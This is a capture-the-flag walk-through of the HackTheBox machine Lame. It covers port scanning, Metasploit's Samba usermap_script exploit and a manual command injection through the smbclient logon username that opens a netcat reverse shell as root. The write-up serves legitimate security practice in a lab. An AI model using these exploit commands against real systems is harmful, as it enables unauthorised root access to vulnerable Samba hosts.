Walk-through of Lame from HackTheBox
Machine Information
Lame is a beginner level machine, requiring only one exploit to obtain root access. Skills required are basic knowledge of Linux and enumerating ports and services. Skills learned are identifying vulnerable services and exploiting Samba.
Details | |
---|---|
Hosting Site | HackTheBox |
Link To Machine | HTB - 001 - Easy - Lame |
Machine Release Date | 14th March 2017 |
Date I Completed It | 14th July 2019 |
Distribution used | Kali 2019.1 – Release Info |
Method using Meterpreter
Initial Recon
Check for open ports with Nmap:
root@kali:~/htb/lame# nmap -sS -sC -sV -oA lame -p- -T4 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-16 22:10 BST
Nmap scan report for 10.10.10.3
Host is up (0.037s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.14
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup:WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup:WORKGROUP)
3632/tcp open distccd distccd v1((GNU)4.2.4(Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2d23h00m43s, deviation: 0s, median: -2d23h00m43s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2019-07-13T14:11:05-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
Lots of ports open. Has port 21 open with anonymous FTP, but looking around there is nothing obvious.
Gaining Access
Box is running vsftpd 2.3.4 so check searchsploit for vulnerability:
root@kali:~/htb/lame# searchsploit vsftpd
---------------------------------------------------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service(1) | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service(2) | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb
---------------------------------------------------------------------------------
Last one in above list for backdoor execution looks good. Start Metasploit and load exploit:
root@kali:~/htb/lame# msfconsole
msf5 > search vsftpd 2.3.4
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 > show options
msf5 > set RHOST 10.10.10.3
msf5 > exploit
No luck, go back to list of services, now try samba on port 445:
root@kali:~/htb/lame# searchsploit samba 3.0.20
---------------------------------------------------------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | exploits/unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | exploits/linux/remote/7701.txt
---------------------------------------------------------------------------------
Remote heap overflow sounds promising, go back in to Metasploit and try it:
root@kali:~/htb/lame# msfconsole
msf5 > search samba 3.0.20
msf5 > use exploit/multi/samba/usermap_script
msf5 > set RHOST 10.10.10.3
msf5 > exploit
[*] Started reverse TCP double handler on 10.10.14.14:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo NKYmctrocnnm8nuo;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "NKYmctrocnnm8nuo\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.14:4444 -> 10.10.10.3:35080) at 2019-07-16 22:18:10 +0100
This works and I now have a reverse shell on to the box.
User and Root Flags
I have a shell, but need an interactive one to make progress:
msf5 > shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
Now have interactive shell so get the user flag:
# ls /home
ftp makis service user
# ls /home/makis
user.txt
# cat /home/makis/user.txt
# cat /root/root.txt
Alternative Method (without Meterpreter)
Start a Netcat session listening on my Kali machine:
root@kali:~/htb/lame# nc –lvp 4444
Switch to another terminal and use smbclient to connect:
root@kali:~/htb/lame# smbclient //10.10.10.3/tmp
Enter WORKGROUP\root's password: <--- just press enter
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> logon "./=`nohup nc 10.10.14.22 4444 –e /bin/bash`"
Password: <--- just press enter
Switch back to Netcat terminal and should have root shell:
# id
uid=0(root) gid=0(root)
I can now get the user and root flags, from the paths the same as above.
Comments